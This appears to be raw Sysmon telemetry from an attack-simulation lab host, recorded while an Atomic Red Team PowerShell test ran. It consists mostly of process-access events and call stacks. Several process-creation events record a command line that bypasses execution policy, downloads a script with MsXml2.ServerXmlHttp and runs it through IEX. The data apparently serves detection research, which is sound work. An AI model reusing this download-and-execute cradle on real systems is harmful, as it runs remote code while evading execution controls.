16:56:28.764{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.764{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.717{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.717{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002244243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:28.701{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224\PSHost.132591777886091606.4224.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002244242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.670{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_b5ian4mh.vkn.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.670{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oiw0o1w1.z2g.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.645{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oiw0o1w1.z2g.ps12021-03-02 16:56:28.645 10341000x80000000000000002244239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.645{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.608{05ADC7E1-6E3C-603E-FFAA-00000000AD01}137887240C:\Windows\system32\cmd.exe{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002244231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.609{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6E3C-603E-FFAA-00000000AD01}13788C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"" 10341000x80000000000000002244230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3C-603E-FFAA-00000000AD01}13788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3C-603E-FFAA-00000000AD01}13788C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002244228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E3C-603E-FFAA-00000000AD01}13788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3C-603E-FFAA-00000000AD01}13788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002244222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.597{05ADC7E1-6E3C-603E-FFAA-00000000AD01}13788C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002244221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002244220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.592{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 10341000x80000000000000002244219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.420{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 